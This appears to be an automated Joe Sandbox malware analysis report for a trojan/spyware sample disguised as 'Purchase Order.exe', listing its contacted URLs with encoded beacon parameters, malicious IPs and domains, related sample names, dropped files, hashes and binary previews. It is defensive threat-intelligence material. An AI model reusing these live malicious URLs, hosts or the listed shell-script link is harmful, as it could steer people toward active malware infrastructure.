http://www.majordaiyanoace.com/hcfu/?u0Gp2vp8=nmIKxue9fq/wPVZukOB9TkwbQhnMn+EZhkHuSgXE385x5HS1Nfm9dHmrnO7NAE1ZtguQW3vFvHO2aEKxRmVjqrDRtY5yZbLfhBI/hScq3dTS&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.khelojeetopro.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.patrickguarte.com/hcfu/?u0Gp2vp8=QpRnf8hbMplr0MVruU+mSsmXd47Y/RN6g+aq49FGHEQqzvBAGK38lH6pvC4RIkCAaMFgrfUcGt/BsHWKvIAR7oL0ypwQXqHPXRUpgIJQNUAI&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.paulmontecalvo.com/hcfu/?u0Gp2vp8=hgu/VmoXDf6UNxe0oUcrLUetbm135fy9k2oFvNtbYeh4n6osOzYSt1ckvEFN+4fwt+77PX6U4+O9/Te6nTne3r1wHJXq9JP+reirnUB6JbLe&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.occludy.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=3O8YptSPemKM8sIzZF8JOEGsdynbMd9NIarJRYJ/0cybmcm84igDod77Kw8YrhDfbeeXJmV/Xta+McyiqIfptDKdRtzZKR6FvkWjf1CaB2nt	true	Avira URL Cloud: safe	unknown
http://www.lilustrlousdates.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=4DW0Ix2ISCDXzyRIq6nLWpFg/kOd6MPQeoh+U0+q17Szsp1AtfvcjVsYAYVpuBtjTM9sWhorW0wi6/FtiSniUr4Ev2EWFbeUdNVgc9Noh4aH	true	Avira URL Cloud: safe	unknown
http://www.majordaiyanoace.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.khelojeetopro.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=MNpom6rckKTYc/p1bd1msiE7/E65ho0u4Akvh+C3tvGatf13TKlIwaeKtMXL5ZEx/m2/gQUExMh3ECGJi31qDG5C0hkBNbhOEhSrDflhNah3	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	178I6H21.16.dr	false		high
https://duckduckgo.com/ac/?q=	178I6H21.16.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	178I6H21.16.dr	false		high
http://www.litespeedtech.com/error-page	rundll32.exe, 00000010.00000002.781911568.00000000056C4000.00000004.10000000.00040000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	178I6H21.16.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	178I6H21.16.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	178I6H21.16.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	Purchase Order.exe	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	178I6H21.16.dr	false		high
https://ac.ecosia.org/autocomplete?q=	178I6H21.16.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	178I6H21.16.dr	false		high
http://malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnss	rundll32.exe, 00000010.00000002.781832452.00000000053A0000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.searchvity.com/	rundll32.exe, 00000010.00000002.781653306.0000000004D58000.00000004.10000000.00040000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.searchvity.com/?dn=	rundll32.exe, 00000010.00000002.781653306.0000000004D58000.00000004.10000000.00040000.00000000.sdmp	true	URL Reputation: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	178I6H21.16.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.141.64.241	montazeran.net	Iran (ISLAMIC Republic Of)	286	KPNNL	true
63.32.216.166	m1.mtrafficgeo.com	United States	16509	AMAZON-02US	true
150.95.59.33	majordaiyanoace.com	Japan	7506	INTERQGMOInternetIncJP	true
46.249.204.182	www.opulentdome.uk	United Kingdom	12703	PULSANT-ASGB	true
155.159.61.221	www.patrickguarte.com	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
74.124.203.191	wewantabreak.com	United States	22611	IMH-WESTUS	true
66.96.162.130	www.modbox.site	United States	29873	BIZLAND-SDUS	true
217.160.0.87	www.occludy.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
51.79.230.147	malaya.live	Canada	16276	OVHFR	true
192.64.116.149	www.bandmarket.live	United States	22612	NAMECHEAP-NETUS	true
3.13.90.76	www.biggaming.xyz	United States	16509	AMAZON-02US	true
38.40.162.145	www.paulmontecalvo.com	United States	174	COGENT-174US	true
154.209.88.140	www.nnncb.top	Seychelles	40065	CNSERVERSUS	true
185.106.208.3	aurakids.website	Turkey	42846	GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTR	true
103.175.163.144	khelojeetopro.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	728988
Start date and time:	2022-10-24 11:04:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Purchase Order.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/9@16/17
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 37.6% (good quality ratio 33.8%) Quality average: 72.5% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 96 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
11:05:14	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
74.124.203.191	Transfer application form.exe	Get hash	malicious	Browse
74.124.203.191	PO_88015340.exe	Get hash	malicious	Browse
66.96.162.130	TT copy.exe	Get hash	malicious	Browse	www.408wmountain.info/umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp
	paymentcopy_0012.exe	Get hash	malicious	Browse	www.408wmountain.info/umat/?vTAl2hqx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2TiU3Fvqg8Jj&E6fT=0PnHHJyp
	Order of CB-15GL PO530_pdf.exe	Get hash	malicious	Browse	www.bettermebodyandmind.com/sw39/?LH=uOHk+/Tn0I1jmzKpLAwzUrUjUTBN/GIGlHrNhXnX28K+7+Q6fi3jpetsD46xU6fC41gX&3fwhCH=IfQP3fLHkzxt4NjP
	New Purchase Order-210809.exe	Get hash	malicious	Browse	www.michaelhumphriesrealestate.com/p4se/?r6Al=b8eTitdpXLzLSR&6lotI4Q=/xtlfYM5FtC9TdVIXVsa4PEA7UJ+zSzKFQ+AyZB9ngNtsQZQVeDM7axlG5m09ACuZmDs
	JFTheJBrKk.exe	Get hash	malicious	Browse	www.kumarendran.com/dd2v/?eVkD=TBAos07z/qXipcEyLteYOxPm9fjPD++3zmmmAM4mldwtYR6r4nCWIJeBPLJwja4XaEhW&KL04q=e2MXwtahrDUPG680
	PURCHASE ORDER 72121.exe	Get hash	malicious	Browse	www.michaelhumphriesrealestate.com/p4se/?SHsd=0N9xPRr&zVzpat=/xtlfYM5FtC9TdVIXVsa4PEA7UJ+zSzKFQ+AyZB9ngNtsQZQVeDM7axlG6GkyhSWHDqr
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	www.goeseo.com/meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj
	50% payment.exe	Get hash	malicious	Browse	www.nicksayler.net/ey9c/?VRKt=wBZlC2d0f6W4LB&BZOPIF=zemMvuHYOZF6HFuoZzbL7otG0FuLt5HQ0QHjJ1h3UiaYeVUoeANMZZbryDjJGiqNYZ4O
	o0Ka2BsNBq.exe	Get hash	malicious	Browse	www.imaginenationnetwork.com/8rg4/?AdkDpFa=8m/W0lhjduV58ZCB+v/V4udkt2Gx5MpGpLsDd1ppZKo4MszNwiI0YkW1Mn6ANFSTV5IZUjNr5g==&pPX=EFQD_FT0CVqx
	43order pdf.exe	Get hash	malicious	Browse	www.admarketingsales.com/nk7/?VBl=XTL8HNfpyPY&hdr4D=Lc54ZMkx7TXzX8Hn+HSOC/SDZ1fuYvEd/qDSQ5e94F4oyaPb0rbdlEOtPyLKhkDNTfwG

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
natroredirect.natrocdn.com	img1910202258454857453739.exe	Get hash	malicious	Browse	85.159.66.93
	SWIFT1810202258454857453739.exe	Get hash	malicious	Browse	85.159.66.93
	Urgent RFQ No.6554342.vbs	Get hash	malicious	Browse	85.159.66.93
	RFQ Bidding of 38D OBA project..vbs	Get hash	malicious	Browse	85.159.66.93
	3fYQPnqYSV.exe	Get hash	malicious	Browse	85.159.66.93
	ORDER REQUEST, ISO, TAX DOC.COMPANY DOC.exe	Get hash	malicious	Browse	85.159.66.93
	Odeme havale bildirimi TL82160020040-R20221006518562707503.exe	Get hash	malicious	Browse	85.159.66.93
	uIMGDVshZg.exe	Get hash	malicious	Browse	85.159.66.93
	DHL-Official-Returned Document_Details & Forms for shipment_Tuesday_04_10.exe	Get hash	malicious	Browse	85.159.66.93
	Swift copy_details.scr.exe	Get hash	malicious	Browse	85.159.66.93
	DHL-Official-Returned Document_Details & Forms for shipment_Monday_03_10.exe	Get hash	malicious	Browse	85.159.66.93
	ORDER NO VOL- 6542 335 22.exe	Get hash	malicious	Browse	85.159.66.93
	RFQ 18757 FOR CPUW-1022601_Pdf__.exe	Get hash	malicious	Browse	85.159.66.93
	Purchase Order7100712022.js	Get hash	malicious	Browse	85.159.66.93
	5050NW 60 RGBW Strip 24V IP20.vbs	Get hash	malicious	Browse	85.159.66.93
	RjGM2z2Z3gVHbRl.exe	Get hash	malicious	Browse	85.159.66.93
	Ufkes orderbevestiging_VOR2202468_20220919_13-37_pdf.exe	Get hash	malicious	Browse	85.159.66.93
	DHL AWB_#factura de recibo de 79654210,pdf.exe	Get hash	malicious	Browse	85.159.66.93
	DHL AWB_#factura de recibo de 79654210,pdf.exe	Get hash	malicious	Browse	85.159.66.93
	Feoml1f5Wl.exe	Get hash	malicious	Browse	85.159.66.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
KPNNL	7uOVw0kjLY.elf	Get hash	malicious	Browse	62.132.39.100
	mP9jNG2nDd.elf	Get hash	malicious	Browse	62.132.39.169
	zt93L9KHlR.elf	Get hash	malicious	Browse	62.132.39.105
	M09RmKZC3g.elf	Get hash	malicious	Browse	92.71.179.91
	7fcgbYgaOY.elf	Get hash	malicious	Browse	62.132.109.184
	JTeJA9y32r.elf	Get hash	malicious	Browse	145.8.211.189
	luT6Dnvntm.elf	Get hash	malicious	Browse	62.41.101.166
	mN9MPx8O8x.elf	Get hash	malicious	Browse	212.189.107.99
	Fqhxqw2c87.elf	Get hash	malicious	Browse	62.132.193.104
	tLXBiZMcFJ.elf	Get hash	malicious	Browse	92.71.180.91
	rctVL9toM1.elf	Get hash	malicious	Browse	134.222.166.192
	Jj2Im3H7a9	Get hash	malicious	Browse	62.132.39.104
	UyMx5FaGyH	Get hash	malicious	Browse	145.8.211.149
	9pO9hJ6ljY	Get hash	malicious	Browse	145.8.211.136
	BDcTUiSlFZ	Get hash	malicious	Browse	62.132.169.33
	x6p67a8g2z	Get hash	malicious	Browse	62.132.39.147
	361ybmgDmR	Get hash	malicious	Browse	62.132.39.162
	woKeOBz1mb	Get hash	malicious	Browse	62.132.39.157
	1oam9mzJrs	Get hash	malicious	Browse	62.41.109.2
	skid.x86-20220820-1520	Get hash	malicious	Browse	212.189.108.115
AMAZON-02US	http://yifysubtitles.org	Get hash	malicious	Browse	52.84.186.8
	jByRaPZ2js.exe	Get hash	malicious	Browse	75.2.70.75
	https://pub.marq.com/0ef79749-1836-4a77-bba8-215c17704000/	Get hash	malicious	Browse	52.222.214.24
	DHL-INVOICE-MBV.exe	Get hash	malicious	Browse	54.77.19.84
	Tel+099545 Messages Redial .html	Get hash	malicious	Browse	52.222.149.40
	http://109.206.241.129/666.sh	Get hash	malicious	Browse	52.89.20.60
	https://www.smeef.org/find_v2/_click?_t_id=1B2M2Y8AsgTpgAmY7PhCfg%3D%3D&_t_q=&_t_tags=language%3Aen%2Csiteid%3A1649ec32-15af-4a13-8a0c-ace198b58648&_t_ip=66.249.79.155&_t_hit.id=SME_Models_Pages_ContentDetailPage/_b4998d67-bd52-4d97-b5ac-b24a0841ff3c_en&_t_hit.pos=185&_t_redirect=https%3A%2F%2Fchckin.ink?e=bWlrZS5zdG93QHJoZWlubWV0YWxsLmNvbQ==	Get hash	malicious	Browse	13.224.132.90
	NlF5EBMJtw.elf	Get hash	malicious	Browse	13.226.52.91
	c5Yo3bKr85.elf	Get hash	malicious	Browse	52.43.223.125
	LeAA8MMXJs.elf	Get hash	malicious	Browse	54.150.59.203
	agent.exe	Get hash	malicious	Browse	3.131.147.49
	payload_enc.exe	Get hash	malicious	Browse	3.129.187.220
	agent.exe	Get hash	malicious	Browse	3.22.15.135
	payload_enc.exe	Get hash	malicious	Browse	3.129.187.220
	b7UPvNgD0g.elf	Get hash	malicious	Browse	18.253.84.21
	2goaafTSO5.elf	Get hash	malicious	Browse	34.214.217.195
	fMB6uAXjd0.elf	Get hash	malicious	Browse	54.150.59.224
	QBNg5KzcE6.exe	Get hash	malicious	Browse	35.157.111.131
	https://workdrive.zohopublic.eu/writer/open/9wca9427c87fa356b4b27b10606cdaea68e8f	Get hash	malicious	Browse	143.204.231.95
	1PLiEs2UMS.elf	Get hash	malicious	Browse	18.225.67.9

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sphybwtjm.exe_f770d34aeed427c6ae898f44d1c585448f77cbb_4ba501be_16731091\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8211253314626112
Encrypted:	false
SSDEEP:	192:jvMFTM0BHkigMP9Mjpx/u7sZS274ItrI:rMxM0Rkig/jP/u7sZX4Itc
MD5:	13D109D90C2AD40CA0E23C9225DE3F4E
SHA1:	3CA27D8B341D6605574D8E5592B2B2C3098C6FAD
SHA-256:	3BEE148C5A7A4852E45BEE8443FA29F618F488A2882899410508A7FAB056D0A4
SHA-512:	430CFA016E6E698DF70F312D1CF336F570DD8E6A60EBABE6AC88CD974B407A4A4A7F0C0A12ABF4CA2DE78F5DAD51C9E1ACE7C52633DE850BABD0AB0818E4E821
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.1.1.0.8.3.1.1.3.6.6.3.1.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.1.1.0.8.3.1.2.7.1.0.0.6.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.f.c.b.a.0.4.-.5.5.4.3.-.4.9.4.1.-.8.3.d.b.-.7.5.c.8.9.e.e.9.4.5.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.b.3.e.6.6.d.-.7.3.3.a.-.4.1.d.c.-.b.7.3.0.-.6.4.c.0.4.e.8.9.2.8.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.p.h.y.b.w.t.j.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.5.c.-.0.0.0.1.-.0.0.1.a.-.d.0.b.1.-.0.b.2.5.d.3.e.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.4.d.9.2.7.a.5.5.8.9.f.8.d.0.8.4.5.8.5.c.8.d.7.7.1.3.c.f.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.e.f.a.6.a.8.0.e.1.b.0.1.d.a.2.5.d.2.5.3.d.4.0.a.a.a.b.3.5.e.e.0.5.9.6.3.2.4.c.6.!.s.p.h.y.b.w.t.j.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 24 18:05:11 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	56664
Entropy (8bit):	1.8560721366122697
Encrypted:	false
SSDEEP:	192:4y/JU/JOT18W2rPg1CKCjILKCp5wD8d62RSgbEYItwgqDgX6rearZpTg6mUF+:NGMT1gVCp08dxSg0CgFKfr7TnmUF+
MD5:	83240D326CFF17B0439A3A05274BA3EF
SHA1:	966E9288AA88DF91423498C1A1EDD072F3EEE1BD
SHA-256:	922ABA18FF1051E0727115BFEF3A81B3E8278391ED6B5927DD8606AFA8EE5974
SHA-512:	F22AB00B3824B86507879E37272124E77CE90017BF420E1A93CD5C7224A19DB609F6BFE122CBB1EFBEAF4298BAD9690D147735DECE8D1FFBDAF47403509B32E7
Malicious:	false
Reputation:	low
Preview:	MDMP....... .........Vc.........................................(..........T.......8...........T...........p................................................................................................U...........B......h.......GenuineIntelW...........T.......\.....Vc.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER893.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.692107825680944
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNidD6Iq36YX+h6tgmfkSxbJCpDY89bovsfkgYm:RrlsNi56Iq36YY6tgmfkSeoUfk2
MD5:	A50E78FD777A536AC0C736D0B0C59176
SHA1:	8D15556F2BC29423308E64EAEA3B962BB45337B5
SHA-256:	9DFD2AE5CEBC7D0EA06B865DFC468A0C8DD2A7B144320793D11BBF125E389334
SHA-512:	4A53652D79CA1A89C2D0E1773EC48C84DC623B38788ABEA16613809DC26B03608225C44F1D3C54BB36C3CAC4E3095F73247F8D5BA8F88B43EB8C266113539F1A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER921.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4659
Entropy (8bit):	4.4382043905431035
Encrypted:	false
SSDEEP:	48:cvIwSD8zsgJgtWI9/PWgc8sqYjV8fm8M4JyPFLsBW+q8vBe3g3dTd:uITfmoegrsqYGJOsBWK43SdTd
MD5:	9D85F7B28EE9D7C597A1F4AE69E6DDC4
SHA1:	EB65E96DAA8BD66ABFDEEDED9E5D11E53954313B
SHA-256:	3F25C3FF964D537DF89FAAD0DBAAC03835421B3FAB3105EEA81B4333AA58C418
SHA-512:	6900FCE612CD6AE20CDE5F5C7F112502813FC2A2ECE14C1596949EB1E8845C30098F59DD015235BEA521FC30FA867ABDD74B0679F2272BFAA8C523C6776924A7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1749795" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Temp\178I6H21

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	94208
Entropy (8bit):	1.2889923589460437
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
MD5:	7901DD9DF50A993306401B7360977746
SHA1:	E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
SHA-256:	1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
SHA-512:	90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EEF0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\sphybwtjm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	189440
Entropy (8bit):	7.950980429334031
Encrypted:	false
SSDEEP:	3072:y8Ra7wY1FP1aUKyJ8wNMTqqTrY+nbMbpl+TVp7kGnqiIcP1pTzsIJK:PM1Ha3I8ka5M+bMO4TGP
MD5:	43D380B1BDACA267CD40153A42BCF2E0
SHA1:	4E0C459FBA54DD6F7D70DA3C9A6C555BC74628BD
SHA-256:	D24F2BDDCAA470C3AE33C2F1BC20A58EDB50F2E843215857B1273032DDF8D4C7
SHA-512:	042D30B0FD000A25B0FFBAE2268BF6EC8E3E7480E4A4C1C9790AD37A972A503ACA0526F892DA1C789F8BB5A3A38E2D5B5930CDB85C7E3CC5808AB240C7707703
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 69%
Preview:	MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.........l..}...}...}.....}.....}.....}..Rich.}..................PE..L......J..........................................@.......................................@..........................................................................................................................................................text...8........................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dmpeedmj.ob

Download File

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	data
Category:	dropped
Size (bytes):	4657
Entropy (8bit):	7.961238567850496
Encrypted:	false
SSDEEP:	96:w3anOxYNX/3Jmz1uk5fK9MnjxtH3dVPHoLbD90LW+gqkD:w3aYMvQz1uk5fpnjdt6b6LbUD
MD5:	EB3DDCAF2D78D39BF7E53FE45B34F2F3
SHA1:	8764065B61E8DC169ACA39CB6D63033CCD127229
SHA-256:	62D303193998FD4BF9E01A648B79197ACCD96C2D3DF1FF304E2FC63DFE58097D
SHA-512:	AEFB4D508BEAAF7FA454406C275D7184734566B6DBAF9C7082CAA3D8F4B773A880CDF22741BE588DB5A8BBBAE7FF381388F5C994C52EAE7CEC1DAADBF6F06AA5
Malicious:	false
Preview:	!.....{...........Fl.U?...j......r;w.B.'.......T'%'(.....0.}.......R.su[..OZ..M.......y..D..BJ......P.2.!.......{^C..B...zklq..\....Y......x.8.:#$)..\d..P..8.m.{.y;ZD.7.\|8S...7^.;#........v......%.Mp..%./...h..57..1..,.@>J3...p..K..U..u..d...4]....b....u..\|.#...2...x...H..@.....y.H......TE....dp....w%..{..#...'^E.mnQO.?....2.....D.J...Y...s#,._@..}3./..UC..4b..0.<$.'qR.a...LJ..._..q..p...5.......P..s..g'y.U...Y.s..i.!i.W..\..I.JC.{.h.F.T..;.....F..8.......(.a......;9;;....u..d.......A.)G.}.......8.<S.f.D...........7....%......\|.......F.ydqr4m.\..f...R./...9~.q\..L.9..m.T....i.....5...=..#.F.k.).....K.c.`.du..~,.~#..O..:..O..P8....`...?).L>.._h.{.N i..,,)..=....e.,.&.3.$..R...DH0.-.9I.8....v......znS......%./.Ou.G...._H*..........GHM.....H...\|.q.'.#....q}:...t...{...o.....F.w.)n.....!...cw..FY..N..U.[....@..[.........Z.C..s..I......Ew.....S.U....W.F~0M.iZh.+...c\>vn&....$-~r.92.&........KwYu.t...\|Y..2...hhf..Yg...>...b....u..

C:\Users\user\AppData\Local\Temp\mlofdcd.wg

Download File

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.998531013688969
Encrypted:	true
SSDEEP:	3072:843Wk2GgXeoejZQFAJE5nSJRbyfMqCJud7QKjWoSks5253BcKAfNfl+6Rl8KxWy4:f3Wk2GlzW2EIHbwMbcd0XA5VAVt5OcWb
MD5:	5F634AC6089902035A58B12097B49E95
SHA1:	DA6714F110440107ADE70BBDCADC57283A1A9E5E
SHA-256:	C32C31A91F738B4DBA03F460F208E736394FDFB6572D3A03F80B1DB00D621CBA
SHA-512:	40130EE36DF2B8B28D017F1F9856AA8FE97FE61281EADFD6748CF5461C327C93A3211BC0919185CED9605A0529BA146126025FB0244E446321D128E8265210A9
Malicious:	false
